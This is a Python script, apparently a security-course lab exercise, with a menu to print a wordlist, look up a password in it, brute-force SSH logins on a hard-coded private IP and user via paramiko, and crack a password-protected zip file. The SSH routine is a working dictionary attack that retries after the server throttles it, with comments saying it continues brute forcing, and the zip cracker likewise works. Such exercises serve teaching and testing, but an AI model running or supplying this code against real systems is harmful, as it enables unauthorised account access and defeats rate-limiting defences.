#!/usr/bin/env python3

#Script Name: bruteforce
#Purpose: checks a file line by line
#Example usage: Iterate the file line by line, may be used to match it against a password
#Expected output: List of strings in the file
#variables: choice, path, file, lines, word, string, content

import paramiko, time, socket, sys, zipfile, logging

global host, user, secret
host = "192.168.18.73"
user = "chris"
pass_file = "/home/vmubuntu/wordlist/breaker.txt"
#variables for SSH

def menu():
    print("\n    ***** MENU *****    ")
    print("\nwhat would you like to do?\n")
    print("1) Dictionary Iterator")
    print("2) Password Recognizer")
    print("3) Brute force SSH")
    print("4) Brute force Zip file")
    print("5) Exit")
    choice = input()
    return choice

def action(choice):    
    if choice == "1":
        iterator()
         
    elif choice == "2":
        recognizer()
    
    elif choice == "3":
        look_through(pass_file)    
    
    elif choice == "4":
        zip_file()
        
    elif choice == "5":
        exit()    
        
    else:
        print ("\nPlease choose among the options")
        
#Iterates through every word, assigns it to a variable and prints it
def iterator():
    path = input("\nPlease provide Wordlist file path: ")
    #Passes user's provided path file path into a variable
    print("\nListing all passwords...")
    file = open(path, encoding = "ISO-8859-1")
    #Opens the file and prepares it to be encoded so it can be encode to a variable
    lines = file.readline()
    #Reads every line and place it into a variable
    
    while lines:
        lines = lines.rstrip()
        #removes empty spaces after the string
        word = lines
        print(word)
        time.sleep(1)
        #Stops for 1 second
        lines = file.readline()
        #Goes to the next line
    file.close()
    #closes the file
    
# Looks to match user's input with list in a file provided
def recognizer():
    string = input("\nPlease provide password to look for: ")
    #Requests password to look for
    path = input("\nNow file path to search for a match: ")
    #File to look through
    
    f = open(path, 'r')
    #opens the file for reading 
    file = f.readlines()
    #Reads all lines of the file at once
    file.append("EOF")
    for lines in file:
        content = lines.rstrip()
        #Empty spaces are removed from the list
        if content == string:
        #if the password inputs matches 
            print("Your password appears in the list")
            break
        elif content == "EOF" and content != string:
            print("Your password is not in the list")
        else:
        #It is needed so the loop doesn't keep printing the response
            continue
    f.close()

#Try to SSH into the system with the given credentials(strings) and handles exceptions                        
def connection(host, username, password):
   initialize = paramiko.SSHClient()
   #Initialize ssh client
   initialize.set_missing_host_key_policy(paramiko.AutoAddPolicy())
   #Add to know hosts 
   
   logging.basicConfig(file="scan_log.txt" ,level=logging.INFO,format="%(asctime)s:%(levelname)s:%(message)s", datefmt="%d/%m/%Y%I:%M:%S %p")

   logging.info("New scan in process")
      
   try:
       initialize.connect(host, port=22, username=user, password=password)    
        #Inputs given credentials
        
   except paramiko.AuthenticationException:
   ###except paramiko.AuthenticationException & as msg:
   #Failed authentication by credentials    
       print (f"[!] Invalid credentials for {username} : {password}")
       #f let you read variable inside the ""
       ###logging.exception(msg)
       return False
          
   except socket.error:
   #Connection failed because is unreachable or any connection error 
       print(f"[!] Connection to IP: {host} couldn't be established")
       ###logging.exception(msg)
       return False
   
   except paramiko.SSHException:
   #Server detected brute force attack so we stop.
        print("[!] Too many attempts, retrying in 10 seconds...")
        time.sleep(10)
        #Sleep for a minute
        ###logging.exception(msg)
        return connection(host, username, password)
        #Continue brute forcing server
   
   #Gives alternative message when manually stoping the script
   except KeyboardInterrupt:
        print ("\n[*] ^_^ Goodbye!")
        sys.exit(3)
        #Code 3, specific message
   
   else:    
        print(f"\n[*] Password cracked: {username} : {password}\n")
        return True
   ###logging.info("Credentials handled")
        
#Iterates through passwords in file and pass them through the next function for validation
def look_through(pass_file):
    file = open(pass_file, encoding = "ISO-8859-1")
    print()
    for i in file.readlines():
    #Reads each element in the file
        secret = i.strip()
        #Removes empty spaces for the string
        victory = connection(host, user, secret)
        #Call on the function and passses "secret" as "password"
        #Stops the list when it finds the match
        if victory == True:
            break
        else:
            continue    
        
def zip_file():  

    wordlist = "/home/vmubuntu/wordlist/cracker.txt"
    path = "/home/vmubuntu/gits/401challengess/test.zip"
    destination = "/home/vmubuntu/gits/401challengess/here"

    with open(wordlist, "rb") as content:
    #Reads wordlist in binary mode
        list = content.readlines()
        #Places all content in a list
        target = zipfile.ZipFile(path)
        #Places action to unzip in a variable    

    print ("\nLooking for a match...\n")
    time.sleep(2)
    
    #Iterates through every password in the file to crack the zip file and extract the content    
    for element in list:
        try:
            password = element.strip()
            target.extractall(path=destination, pwd=password)
            #Extracts all file from the zip file with given password
            print(f"\nYou have a Winner: {password.decode().strip()} is the password")
            print ("Zip files have been extracted to ", destination)
            break
    
        except:
            print(f"{password.decode()} is not a match")
    
    else:
        print("\nNot password found in the wordlist")
    
#Main function                                     
def main():
    for i in range (5):
    #Let the user use the menu up to 5 times at a time
        choice = menu()
        action(choice)
main()
